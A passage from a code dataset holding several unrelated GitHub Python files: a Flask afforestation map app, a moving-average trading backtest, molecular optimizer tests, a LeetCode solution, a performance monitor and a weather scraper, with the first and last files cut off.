measure_control=MeasureControl(), data_source=db_data_json_new)\nmap_health = folium.Map(location=[35.000, 33.000], zoom_start=8)\nmap_soil = folium.Map(location=[35.000, 33.000], zoom_start=8)\nmap_osm.add_child(MeasureControl())\nmap_health.add_child(measure_control)\nmap_soil.add_child(MeasureControl())\nel = folium.MacroElement().add_to(map_osm)\nel._template = jinja2.Template(\"\"\"\n {% macro script(this, kwargs) %}\n var map_osm = \"\"\"+map_osm.get_name()+\"\"\";\n \"\"\"+map_osm.get_name()+\"\"\".on('measurefinish', function(evt){\n fetch(\"/measureFinish\", {\n method: \"post\",\n headers: {\n \"Accept\": \"app/json\",\n \"Content-Type\": \"app/json\"\n },\n body: JSON.stringify({\n oJS_In: evt\n }, getCircularReplacer())\n });\n });\n\n const getCircularReplacer = () => {\n const seen = new WeakSet()\n return (key, value) => {\n if (typeof value === \"object\" && value !== null) {\n if (seen.has(value)) {\n return\n }\n seen.add(value)\n }\n return value\n }\n }\n {% endmacro %}\n \"\"\")\n\n\n\n@app.route('/news')\ndef afforestation_news():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT id, startDate, endDate, organisation from afforestation\")\n details = cur.fetchall()\n\n print(details)\n return render_template(\"news.html\", details=details)\n\n\npolygons_list = list()\npts_in_list = list()\n\nglobal dict_ploygons\ndict_ploygons = dict()\n\n\n@app.route('/map')\ndef treeTypeMap(): # put app's code here\n db_data_locations = db_data_json_new[[\"Latitude\", \"Longitude\"]]\n db_data_locations_list = db_data_locations.values.tolist()\n db_data_locations_list_size = len(db_data_locations_list)\n global afforestation_filename\n\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT startDate, coordinates, points, endDate, id FROM afforestation\")\n polygons = cur.fetchall()\n print(type(polygons))\n\n for polygon in polygons:\n poly_ID = polygon[4]\n html = popup_html(polygon[0], polygon[1], polygon[3], polygon[4])\n popup1 = folium.Popup(folium.Html(html, script=True), max_width=500)\n\n # html = popup_html(polygon)\n if len(polygon) < 2:\n continue\n act_polygon = json.loads(polygon[1])\n pts_in_list = json.loads(polygon[2]) # get the points from the area in polygon\n print(pts_in_list)\n # polydata(f\"polygon{polygon[4]}\", pts_in_list)\n afforestation_filename = \"jsons/polygon{0}.json\".format(str(polygon[4]))\n if poly_ID not in dict_ploygons.keys():\n dict_ploygons[str(poly_ID)] = \"jsons/polygon{0}.json\".format(str(polygon[4]))\n\n # afforestation_filename = \"jsonpolygons.json\"\n print(type(pts_in_list))\n # list_of_id_pts_pairs.append({polygon[4]: pts_in_list})\n # poly_data_dump(afforestation_filename)\n # polydata(f\"polygon{polygons.index(polygon)}\", pts_in_list) #attach data from pts list to specific polygon json file -- done\n polydata(f\"polygon{polygon[4]}\", pts_in_list) # to rename the json files with the ids of the afforestations\n # afforestation_filename = \"jsons/polygon{0}.json\".format(str(polygons.index(polygon)))\n # to give the filename of the corresponding json file\n # print(afforestation_filename)\n # with open(f\"polygon{polygons.index(polygon)}\", \"w\") as outfile_pts:\n # json.dump(pts_in_list, outfile_pts)\n # print(polygons.index(polygon))\n print(polygon[4]) # to print the id of the polygon\n print(type(act_polygon))\n print(act_polygon)\n # act_polygon = polygon[1]\n locations = list()\n print(act_polygon)\n print(type(act_polygon))\n # folium.Polygon(locations = polygon)\n for locs in act_polygon:\n locations.append((locs['lat'], locs['lng']))\n # popup1 = folium.Popup(folium.Html(html, script=True), max_width=500)\n if datetime.strptime(polygon[0], '%Y-%m-%d') > datetime.combine(date.today(), datetime.min.time()):\n poly = folium.Polygon(locations=locations, popup=popup1, color=\"red\", weight=2, fill_color=\"red\", fill_opacity=0.02, tooltip=polygon[4])\n poly.add_to(map_osm)\n polygons_list.append(poly)\n else:\n poly = folium.Polygon(locations=locations, popup=popup1, color=\"green\", weight=2, fill_color=\"green\", fill_opacity=0.02, tooltip=polygon[4])\n poly.add_to(map_osm)\n polygons_list.append(poly)\n filepath = \"templates/map.html\"\n if os.path.exists(filepath):\n os.remove(filepath)\n map_osm.save('templates/map.html')\n # poly_data_dump(afforestation_filename)\n return map_osm._repr_html_()\n # return render_template(\"map.html\")\n\ndef polydata(filename, file_src):\n with open(f\"jsons/{filename}.json\", \"w\") as outfile_pts:\n print(pts_in_list)\n json.dump(file_src, outfile_pts)\n\n\n@app.route('/visstatus') # /visstatus/id\ndef visualise_polygon():\n print(afforestation_filename)\n file_name = dict_ploygons[poly_ID_selected]\n obj = pd.read_json(file_name)\n print(\"shshshshsh\")\n dv = plt.pie(obj, names=\"TreeType\", title=\"Tree Types piechart\")\n return io.to_html(dv)\n\n\n@app.route('/visstatushealth')\ndef visualise_polygon_health():\n file_name = dict_ploygons[poly_ID_selected]\n obj = pd.read_json(file_name)\n dv = plt.histogram(obj, x=\"Score\", color=\"Risk\", histfunc=\"count\", title=\"Tree health histogram\")\n\n return io.to_html(dv)\n\n\n@app.route('/visstatussoil')\ndef visualise_polygon_soil():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n dv = plt.pie(data_frame=obj.groupby(['SoilTexture']).mean().reset_index(), values=\"SoilDepth\", names=\"SoilTexture\", title=\"Soil Diversity Pie chart\")\n return io.to_html(dv)\n\n\n@app.route('/visstatuselevation')\ndef visualise_polygon_elevation():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n # dv = plt.histogram(data_frame=obj.groupby(['Elevationlvl']).mean().reset_index(), x=\"Elevationlvl\", y=\"Heightlvl\")\n dv = plt.histogram(data_frame=obj, x=\"Height\", histfunc=\"count\", title=\"Elevation Histogram\")\n\n\n # dv.update_layout(showlegend=False)\n return io.to_html(dv)\n\n\n@app.route('/visstatusweather')\ndef visualise_polygon_weather():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n dv = plt.pie(data_frame=obj.groupby(['Rain']).mean().reset_index(), values=\"AvgRain\", names=\"Rain\", title=\"Average Rain Piechart\")\n return io.to_html(dv)\n\n\n@app.route('/visstatusslope')\ndef visualise_polygon_slope():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n # dv = plt.histogram(data_frame=obj.groupby(['Aspect']).mean().reset_index(), x=\"Aspect\", y=\"Slope\")\n dv = plt.scatter_polar(obj, r=\"Slope\", theta=\"Aspect\",color_discrete_map=plt.colors.sequential.Plasma_r, color=\"Slope\", title=\"Slope and Aspect Scatter Polar chart\")\n\n return io.to_html(dv)\n\n\n@app.route('/globalsoil')\ndef visualise_soil():\n dv = plt.pie(db_data_json_new, values=\"SoilDepth\", names=\"SoilTexture\", title=\"Soil Diversity Piechart\")\n return io.to_html(dv)\n\n\n@app.route('/globalelevation')\ndef visualise_elevation():\n dv = plt.histogram(db_data_json_new, x=\"Height\", histfunc=\"count\", title=\"Elevation histogram\")\n return io.to_html(dv)\n\n\n@app.route('/globalweather')\ndef visualise_weather():\n dv = plt.pie(db_data_json_new, values=\"AvgRain\", names=\"Rain\", title=\"Average Rain Pie chart\")\n return io.to_html(dv)\n\n\n@app.route('/globalslope')\ndef visualise_slope():\n dv = plt.scatter_polar(db_data_json_new, r=\"Slope\", theta=\"Aspect\",color_discrete_map=plt.colors.sequential.Plasma_r, color=\"Slope\", title=\"Slope and Aspect Scatter Polar chart\")\n return io.to_html(dv)\n\n\n\n\n\n# def treeHealth(): # put app's code here\n# db_data_locations = db_data_json_new[[\"Latitude\", \"Longitude\"]]\n# db_data_locations_list = db_data_locations.values.tolist()\n# db_data_locations_list_size = len(db_data_locations_list)\n#\n# for point in range(0, db_data_locations_list_size):\n# html = popup_html(point)\n#\n# popup1 = folium.Popup(folium.Html(html, script=True), max_width=500)\n# if db_data_json_new[\"Burnt\"][point] == \"No\":\n# # folium.Marker(db_data_locations_list[point]).add_to(map_osm)\n# folium.Circle(location=db_data_locations_list[point], color=\"green\", popup=popup1,\n# opacity=db_data_json_new[\"Density\"][point], radius=20, fill_color=\"green\").add_to(map_health)\n# else:\n# folium.Circle(location=db_data_locations_list[point], color=\"red\", popup=popup1,\n# opacity=db_data_json_new[\"Density\"][point], radius=20, fill_color=\"green\").add_to(map_health)\n# # map_health.add_child(measure_control)\n# map_health.save('templates/mapHealth.html')\n# return map_health._repr_html_()\n\n\n\n\n# @app.route('/map')\n# def map():\n# return render_template('map.html')\n\n\n@app.route('/maphealth')\ndef mapHealth():\n return render_template('mapHealth.html')\n\ntrees_json_file = pd.read_json(\"treesplanted.json\")\n@app.route('/treesplanted')\ndef trees_planted():\n dv = plt.line(trees_json_file, x=\"Year\", y=\"TreesPlanted\", markers=True)\n return io.to_html(dv)\n\n\n# @app.route('/afforestations')\n# def afforestations_per_year():\n# con = sqlite3.connect(\"mydb.db\")\n# cur = con.cursor()\n# cur.execute(\"SELECT id, startDate FROM afforestation\")\n# details = cur.fetchall()\n# with open(\"jsonafforestations.json\", \"w\") as outfile:\n# json.dump(details, outfile)\n# dv = plt.box(pd.read_json(\"jsonafforestations.json\"), x=1, y=0)\n# con.close()\n# return io.to_html(dv)\n\n\n\n@app.route('/vis')\ndef dataVis():\n dv = plt.pie(db_data_json_new, names=\"TreeType\", title=\"Tree Types piechart\")\n return io.to_html(dv)\n\n\n@app.route('/visHealth')\ndef dataVisHealth():\n dv = plt.histogram(db_data_json_new, x=\"Score\", color=\"Risk\", histfunc=\"count\", title=\"Tree health histogram\")\n return io.to_html(dv)\n\n\n# @app.route('/visSoil')\n# def dataVisSoil():\n# dv = plt.pie(db_data_json_new, values=\"SoilDepth\", names=\"SoilTexture\")\n#\n# return dv._repr_html_()\n\n\ndict_extrema = dict()\ndata_list = list()\nli_intersect_point = list()\n\n\n@app.route('/measureFinish', methods = ['POST'])\ndef measureFinish():\n data = request.data\n data = json.loads(data)\n data = data['oJS_In']\n dict_extrema['x_max'] = 0\n dict_extrema['y_max'] = 0\n dict_extrema['x_min'] = 0\n dict_extrema['y_min'] = 0\n pts_list = data['points']\n\n if len(pts_list) == 0:\n return json.loads('{ \"response\": \"no_points\" }')\n\n for point in pts_list:\n lat, lng = (point['lat'], point['lng'])\n dict_extrema['x_max'] = lng if lng > dict_extrema['x_max'] else dict_extrema['x_max']\n dict_extrema['y_max'] = lat if lat > dict_extrema['y_max'] else dict_extrema['y_max']\n # dict_extrema['x_min'] = lng if lng < dict_extrema['x_min'] else dict_extrema['x_min']\n # dict_extrema['y_min'] = lat if lat < dict_extrema['y_min'] else dict_extrema['y_min']\n\n if dict_extrema['x_min'] == 0:\n dict_extrema['x_min'] = lng\n else:\n dict_extrema['x_min'] = lng if lng < dict_extrema['x_min'] else dict_extrema['x_min']\n\n if dict_extrema['y_min'] == 0:\n dict_extrema['y_min'] = lat\n else:\n dict_extrema['y_min'] = lat if lat < dict_extrema['y_min'] else dict_extrema['y_min']\n\n for o_point in db_data_parse:\n dict_point = dict()\n dict_point['x'] = o_point['Longitude']\n dict_point['y'] = o_point['Latitude']\n if b_intersects_base_x(dict_extrema, dict_point) and b_intersects_base_y(dict_extrema, dict_point):\n li_intersect_point.append(o_point)\n\n with open(\"specific.json\", \"w\") as outfile:\n json.dump(li_intersect_point, outfile)\n print(li_intersect_point)\n print(len(li_intersect_point))\n print(\"********************\")\n\n data_list.clear()\n data_list.append(data['points'])\n print(data_list)\n return json.loads('{ \"response\": \"success\" }')\n\n\n@app.route('/afforestationform', methods=['GET', 'POST'])\ndef form():\n map = treeTypeMap()\n form = AfforestationForm()\n if request.method == 'POST':\n conn = sqlite3.connect(\"mydb.db\")\n # if form.validate_on_submit():\n\n try:\n # print(coordinates)\n startDate = request.form['startDate']\n endDate = request.form['endDate']\n organisation = request.form['organisation']\n\n ar_points = json.loads(\"\"\"[]\"\"\")\n\n for point in data_list[0]:\n o_point = json.loads(\"\"\"{}\"\"\")\n o_point[\"lat\"] = point[\"lat\"]\n o_point[\"lng\"] = point[\"lng\"]\n ar_points.append(o_point)\n if datetime.strptime(endDate, '%Y-%m-%d') > datetime.strptime(startDate, '%Y-%m-%d') >= \\\n datetime.now() and organisation != \"\" and len(ar_points) > 2:\n\n # startDate = datetime.datetime.strptime(startDate, \"%Y-%m-%d\")\n # endDate = datetime.datetime.strptime(endDate, \"%Y-%m-%d\")\n # conn = sqlite3.connect(\"mydb.db\")\n cur = conn.cursor()\n cur.execute(\"INSERT INTO afforestation(coordinates, startDate, endDate, organisation, points) VALUES(?,?,?,?,?)\",\n (json.dumps(ar_points), startDate, endDate, organisation, json.dumps(li_intersect_point)))\n conn.commit()\n return redirect(url_for('submit_afforestation'))\n else:\n return render_template('applicationform.html', form=form, message=\"Invalid Input\")\n except Exception as e:\n # time.sleep(5)\n # return redirect(url_for(\"form\"))\n print(e)\n finally:\n if datetime.strptime(endDate, '%Y-%m-%d') > datetime.strptime(startDate, '%Y-%m-%d') >= \\\n datetime.now() and organisation != \"\" and len(ar_points) > 2:\n return redirect(url_for('submit_afforestation'))\n else:\n return render_template('applicationform.html', form=form, message=\"Invalid input\")\n\n conn.close()\n\n return render_template('applicationform.html', form=form, message=\"\")\n\n\n@app.route('/thankyouafforestation', methods=[\"GET\"])\ndef submit_afforestation():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT * FROM afforestation ORDER BY id DESC LIMIT 1 \")\n details = cur.fetchone()\n # print(details)\n # print(type(details))\n return render_template(\"thankyouafforestation.html\", details=details)\n\n\ndef get_afforestations():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"select id, organisation from afforestation WHERE startDate >= CURRENT_DATE \")\n data = cur.fetchall()\n # data = [(val[0], val[1]) for val in data]\n con.close()\n return data\n\n# string for ensuring email is in correct format\nregex = r'\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,}\\b'\n\n\n@app.route('/joinform', methods=['GET', 'POST'])\ndef join_form():\n map = treeTypeMap()\n form = JoinForm()\n session[\"afforestation\"] = get_afforestations()\n if request.method == 'POST':\n # if form.validate_on_submit():\n\n # print(coordinates)\n\n afforestation = request.form['afforestation']\n name = request.form['name']\n email = request.form['email']\n\n # startDate = datetime.datetime.strptime(startDate, \"%Y-%m-%d\")\n # endDate = datetime.datetime.strptime(endDate, \"%Y-%m-%d\")\n conn = sqlite3.connect(\"mydb.db\")\n cur = conn.cursor()\n print(\"try to insert\")\n if re.fullmatch(regex, email) and name != \"\":\n cur.execute(\"INSERT INTO volunteer(afforestation, name, email) VALUES(?,?,?)\",\n (afforestation, name, email))\n conn.commit()\n print(\"did it insert\")\n return redirect(url_for('join_afforestation'))\n else:\n return render_template('joinform.html', form=form, afforestation_list=session[\"afforestation\"], message=\"Wrong email format\")\n\n\n return render_template('joinform.html', form=form, afforestation_list=session[\"afforestation\"], message=\"\")\n\n\n@app.route('/thankyoujoin', methods=[\"GET\"])\ndef join_afforestation():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT * FROM volunteer ORDER BY id DESC LIMIT 1 \")\n details = cur.fetchone()\n return render_template(\"thankyou.html\", details=details)\n\n\n\n\n\n# @app.route('/dvs')\n# def specificDV():\n#\n# # for index in range(0, len(li_intersect_point)):\n# # json.dump(li_intersect_point[index], outfile)\n#\n# specific_data = pd.read_json(\"specific.json\")\n# new_data_visualisation = plt.pie(specific_data, values=\"Density\", names=\"Vegetation\") # error is somewhere here\n# return new_data_visualisation._repr_html_()\n#\n# @app.route('/dvshealth')\n# def specificDVhealth():\n#\n# # for index in range(0, len(li_intersect_point)):\n# # json.dump(li_intersect_point[index], outfile)\n#\n# specific_data_health = pd.read_json(\"specific.json\")\n# # new_data_visualisation = plt.pie(specific_data, values=\"Density\", names=\"Vegetation\") # error is somewhere here\n# new_data_visualisation = plt.histogram(specific_data_health, x=\"Burnt\")\n# return new_data_visualisation._repr_html_()\n\n# @app.route('/dvssoil')\n# def specificDVsoil():\n#\n# specific_data_soil = pd.read_json(\"specific.json\")\n# new_data_visualisation = plt.pie(specific_data_soil, values=\"SoilDepth\", names=\"SoilTexture\")\n# return new_data_visualisation._repr_html_()\n\ndef popup_html(startDate, coordinates, endDate, id):\n # i = row\n # latitute = db_data_json_new[\"Latitude\"][i]\n # longitute = db_data_json_new[\"Longitude\"][i]\n # treeType = db_data_json_new[\"Vegetation\"][i]\n # density = db_data_json_new[\"Density\"][i]\n # health = db_data_json_new[\"Burnt\"][i]\n\n html = \"\"\"\n \n \n
    \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
    StartDate\"\"\"+str(startDate)+\"\"\"
    EndDate\"\"\"+str(endDate)+\"\"\"
    Coordinates\"\"\"+str(coordinates)+\"\"\"
    ID\"\"\"+str(id)+\"\"\"
    \n
    \n \n \"\"\"\n return html\n\n\n\ndef b_intersects_base_x(dict_extrema, dict_point):\n return (dict_extrema['x_min'] < dict_point['x'] < dict_extrema['x_max'])\n # and\n # (dict_extrema['y_min'] < dict_point['y'] < dict_extrema['y_max']))\n\ndef b_intersects_base_y(db_extrema, dict_point):\n return (dict_extrema['y_min'] < dict_point['y'] < dict_extrema['y_max'])\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"NickDev42/graduation-project-web-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":27353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21445539354","text":"from io import StringIO\nfrom langdetect import detect\nfrom talib.abstract import *\n\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\n\nclass MovingAverageCrossStrategy(object):\n \"\"\" \n Requires:\n data - A OHLCV DataFrame.\n short_window - Lookback period for short moving average.\n long_window - Lookback period for long moving average.\"\"\"\n\n def __init__(self, data, short_window=5, long_window=20):\n self.data = data\n self.short_window = short_window\n self.long_window = long_window\n\n def generate_signals(self):\n \"\"\"Returns the DataFrame of symbols containing the signals\n to go long, short or hold (1, -1 or 0).\"\"\"\n signals = pd.DataFrame(index=self.data.index)\n signals['signal'] = 0.0\n\n ''' Create the set of short and long simple moving averages over the \n respective periods'''\n signals['short_mavg'] = SMA(self.data.close, self.short_window)\n signals['long_mavg'] = SMA(self.data.close, self.long_window)\n\n ''' Create a 'signal' (invested or not invested) when the short\n moving average crosses the long moving average, but only for\n the period greater than the shortest moving average window'''\n signals.signal[self.short_window:] = np.where(\n signals.short_mavg[self.short_window:] \n > signals.long_mavg[self.short_window:], 1.0, 0.0) \n\n ''' Take the difference of the signals in order to\n generate actual trading orders'''\n signals['position'] = signals.signal.diff() \n\n return signals\n\nclass Portfolio(object):\n \"\"\"Inherits Portfolio to create a system that purchases 100 units of \n a particular symbol upon a long/short signal, assuming the market \n open price of a bar.\n\n In addition, there are zero transaction costs and cash can be immediately \n borrowed for shorting (no margin posting or interest requirements). \n\n Requires:\n data - A OHLCV DataFrame.\n signals - A pandas DataFrame of signals (1, 0, -1) for each symbol.\n initial_capital - The amount in cash at the start of the portfolio.\"\"\"\n\n def __init__(self, data, signals, initial_capital=100000):\n self.data = data\n self.signals = signals\n self.initial_capital = float(initial_capital)\n self.trades = self.generate_trades()\n \n def generate_trades(self):\n \"\"\"Creates a 'trades' DataFrame that simply longs or shorts\n 1000 of the particular symbol based on the forecast signals of\n {1, 0, -1} from the signals DataFrame.\"\"\"\n trades = pd.DataFrame(index=self.signals.index).fillna(0.0)\n trades['trade'] = 1000*self.signals.signal\n return trades\n \n def backtest_portfolio(self):\n \"\"\"Constructs a portfolio from the positions DataFrame by \n assuming the ability to trade at the precise market open price\n of each bar (an unrealistic assumption!). \n\n Calculates the total of cash and the holdings (market price of\n each position per bar), in order to generate an equity curve\n ('total') and a set of bar-based returns ('returns').\n\n Returns the portfolio object to be used elsewhere.\"\"\"\n\n ''' Construct the portfolio DataFrame to use the same index\n as 'trade' and with a set of 'trading orders' in the\n pos_diff' object, assuming market open prices. '''\n portfolio = pd.DataFrame(index=self.data.index)\n pos_diff = self.trades.trade.diff()\n\n '''Create the 'holdings' and 'cash' series by running through\n the trades and adding/subtracting the relevant quantity from\n each column '''\n portfolio['holdings'] = self.trades.trade*self.data.open\n portfolio['cash'] = self.initial_capital-(pos_diff*self.data.open).cumsum()\n\n ''' Finalise the total and bar-based returns based on the 'cash'\n and 'holdings' figures for the portfolio '''\n portfolio['total'] = portfolio.cash + portfolio.holdings\n portfolio['returns'] = portfolio.total.pct_change()\n return portfolio\n\ndaily_trading = pd.read_csv('OHLCV.csv')\nsignals = MovingAverageCrossStrategy(daily_trading).generate_signals()\nportfolio = Portfolio(daily_trading, signals).backtest_portfolio()\n\n\nif __name__ == \"__main__\":\n fig = plt.figure()\n ax1 = fig.add_subplot(211, ylabel='Price in NTD')\n\n ''' plot the closing price overlaid with the moving averages'''\n daily_trading.close.plot(ax=ax1, color='r', lw=2.)\n signals[['short_mavg', 'long_mavg']].plot(ax=ax1, lw=2.)\n\n ''' plot the \"buy\" trades against prices '''\n ax1.plot(signals.loc[signals.position == 1.0].index, \n signals.short_mavg[signals.position == 1.0],\n '^', markersize=10, color='m')\n\n ''' plot the \"sell\" trades against prices '''\n ax1.plot(signals.loc[signals.position == -1.0].index, \n signals.short_mavg[signals.position == -1.0],\n 'v', markersize=10, color='k')\n ax1.axes.xaxis.set_visible(False)\n\n ''' plot the equity curve'''\n ax2 = fig.add_subplot(212, ylabel='Portfolio returns (per 10k NTD)')\n portfolio.returns.cumsum().plot(ax=ax2, lw=2.)\n\n ''' plot the \"buy\" and \"sell\" trades against the equity curve '''\n ax2.plot(portfolio.loc[signals.position == 1.0].index, \n portfolio.returns.cumsum()[signals.position == 1.0],\n '^', markersize=10, color='m')\n ax2.plot(portfolio.loc[signals.position == -1.0].index, \n portfolio.returns.cumsum()[signals.position == -1.0],\n 'v', markersize=10, color='k')\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bobby891018/backtesting-in-stock-price","sub_path":"Strategy.py","file_name":"Strategy.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1595144266","text":"import numpy as np\nfrom mchammer import get_atom_distance\n\n\ndef test_opt_get_bond_vector(\n optimizer, bond_vector, position_matrix\n):\n assert np.all(np.equal(\n bond_vector,\n optimizer._get_bond_vector(position_matrix, (0, 3)),\n ))\n\n\ndef test_opt_bond_potential(optimizer, bond_potentials):\n for i, d in enumerate([1, 2, 3, 4, 5, 6, 7]):\n test = optimizer._bond_potential(distance=d)\n assert np.isclose(test, bond_potentials[i], atol=1E-5)\n\n\ndef test_opt_nonbond_potential(optimizer, nonbond_potentials):\n for i, d in enumerate([1, 2, 3, 4, 5, 6, 7]):\n test = optimizer._nonbond_potential(distance=d)\n assert np.isclose(test, nonbond_potentials[i], atol=1E-5)\n\n\ndef test_opt_compute_nonbonded_potential(\n optimizer, position_matrix, nonbonded_potential\n):\n test = optimizer._compute_nonbonded_potential(position_matrix)\n assert test == nonbonded_potential\n\n\ndef test_opt_compute_potential(\n optimizer, molecule, nonbonded_potential, system_potential\n):\n test_system_potential, test_nonbond_potential = (\n optimizer._compute_potential(\n molecule, bond_pair_ids=((0, 3), ),\n )\n )\n assert test_nonbond_potential == nonbonded_potential\n assert test_system_potential == system_potential\n\n\ndef test_opt_translate_atoms_along_vector(\n optimizer, molecule, position_matrix, position_matrix3\n):\n molecule = molecule.with_position_matrix(position_matrix)\n new_molecule = optimizer._translate_atoms_along_vector(\n mol=molecule,\n atom_ids=(3, 4, 5),\n vector=np.array([0, 5, 0])\n )\n assert np.all(np.equal(\n position_matrix3,\n new_molecule.get_position_matrix(),\n ))\n new_molecule = optimizer._translate_atoms_along_vector(\n mol=new_molecule,\n atom_ids=(3, 4, 5),\n vector=np.array([0, -5, 0])\n )\n print(position_matrix, new_molecule.get_position_matrix())\n assert np.all(np.equal(\n position_matrix,\n new_molecule.get_position_matrix(),\n ))\n\n\ndef test_opt_test_move(optimizer):\n # Do not test random component.\n assert optimizer._test_move(curr_pot=-1, new_pot=-2)\n\n\ndef test_opt_get_result(optimizer, molecule):\n original_pos_mat = molecule.get_position_matrix()\n subunits = molecule.get_subunits(bond_pair_ids=((0, 3), ))\n mol, results = optimizer.get_result(\n mol=molecule,\n bond_pair_ids=((0, 3), ),\n subunits=subunits,\n )\n\n final_bond_length = np.linalg.norm(\n optimizer._get_bond_vector(\n position_matrix=results.get_position_matrix(),\n bond_pair=(0, 3),\n ),\n )\n # Give it some wiggle room.\n assert 1.5 < final_bond_length\n assert final_bond_length < 2.5\n\n # Test all other bond lengths are equivalent.\n for bond in molecule.get_bonds():\n if (bond.get_atom1_id(), bond.get_atom2_id()) != (0, 3):\n test = get_atom_distance(\n position_matrix=results.get_position_matrix(),\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n bond_length = get_atom_distance(\n position_matrix=original_pos_mat,\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n assert np.isclose(test, bond_length, atol=1E-6)\n\n\ndef test_opt_get_trajectory(optimizer, molecule):\n original_pos_mat = molecule.get_position_matrix()\n subunits = molecule.get_subunits(bond_pair_ids=((0, 3), ))\n mol, results = optimizer.get_trajectory(\n mol=molecule,\n bond_pair_ids=((0, 3), ),\n subunits=subunits,\n )\n\n assert results.get_step_count() == 99\n assert len(tuple(results.get_steps_properties())) == 100\n\n final_bond_length = np.linalg.norm(\n optimizer._get_bond_vector(\n position_matrix=results.get_final_position_matrix(),\n bond_pair=(0, 3),\n ),\n )\n # Give it some wiggle room.\n assert 1.5 < final_bond_length\n assert final_bond_length < 2.5\n\n # Test all other bond lengths are equivalent.\n for bond in molecule.get_bonds():\n if (bond.get_atom1_id(), bond.get_atom2_id()) != (0, 3):\n test = get_atom_distance(\n position_matrix=results.get_final_position_matrix(),\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n bond_length = get_atom_distance(\n position_matrix=original_pos_mat,\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n assert np.isclose(test, bond_length, atol=1E-6)\n","repo_name":"andrewtarzia/MCHammer","sub_path":"tests/optimizer/test_optimizer.py","file_name":"test_optimizer.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"31080691495","text":"class Solution:\n def intersection(self, nums: List[List[int]]) -> List[int]:\n counter = collections.defaultdict(int)\n \n for li in nums:\n for num in li:\n counter[num]+=1\n \n ans = []\n n = len(nums)\n for num,count in counter.items():\n if counter[num] == n:\n ans.append(num)\n \n return sorted(ans)","repo_name":"Merwan-J/competetive-programming","sub_path":"2248-intersection-of-multiple-arrays/2248-intersection-of-multiple-arrays.py","file_name":"2248-intersection-of-multiple-arrays.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6478433009","text":"from os import environ\nimport psutil, threading, hashlib\nenviron[\"PYTHONHASHSEED\"] = '1234'\ndef ratio(before, after):\n return 100 * (1 - (after / before))\n\ndef integrity(filename, data = None):\n md5 = hashlib.md5()\n\n # Open,close, read file and calculate MD5 on its contents\n if data == None:\n with open(filename, \"rb\") as file_to_check:\n # read contents of the file\n for block in iter(lambda: file_to_check.read(4096), b''):\n md5.update(block)\n else:\n md5.update(data)\n\n return md5.hexdigest()\n\ndef performance_metrics():\n global running\n global cpu_usage\n global memory_usage\n cpu_usage = []\n memory_usage = []\n\n running = True\n\n current_process = psutil.Process()\n\n # start loop\n while running:\n cpu_usage.append(current_process.cpu_percent(interval = 1))\n memory_usage.append(current_process.memory_percent())\n\ndef performance_metrics_system_wide():\n global running\n global cpu_usage\n global memory_usage\n cpu_usage = []\n memory_usage = []\n\n running = True\n before_cpu_usage = psutil.cpu_percent()\n before_memory_usage = psutil.virtual_memory().percent\n # start loop\n while running:\n cpu_usage.append(abs(psutil.cpu_percent(interval = 1)-before_cpu_usage))\n memory_usage.append(abs(psutil.virtual_memory().percent - before_memory_usage))\n\ndef start():\n global t\n\n # create thread and start it\n t = threading.Thread(target = performance_metrics)\n t.start()\n\ndef start_system_wide():\n global t\n\n # create thread and start it\n t = threading.Thread(target = performance_metrics_system_wide)\n t.start()\n\ndef stop():\n global running\n global cpu_usage\n global memory_usage\n global t\n result = []\n result.append(cpu_usage)\n result.append(memory_usage)\n\n # use `running` to stop loop in thread so thread will end\n running = False\n\n # wait for thread's end\n t.join()\n\n return result\n","repo_name":"achrovisual/ug-wsn-compression","sub_path":"performance_metrics.py","file_name":"performance_metrics.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37546136149","text":"import requests\nfrom lxml import etree\n\n\nsession = requests.Session()\nfirst_url = 'http://www.nmc.cn/publish/observations/environmental.html'\nfog_url = 'http://www.nmc.cn/publish/fog.html'\nhaze_url = 'http://www.nmc.cn/publish/haze.html'\ndust_url = 'http://www.nmc.cn/publish/severeweather/dust.html'\nair_pollution_url = ['http://www.nmc.cn/publish/environment/air_pollution-24.html','http://www.nmc.cn/publish/environment/air_pollution-48.html','http://www.nmc.cn/publish/environment/air_pollution-72.html',]\n\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'\n}\n\ndef real():\n response = session.get(url= first_url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n title = html.xpath('//div[@class=\"writing\"]/div')\n ret = 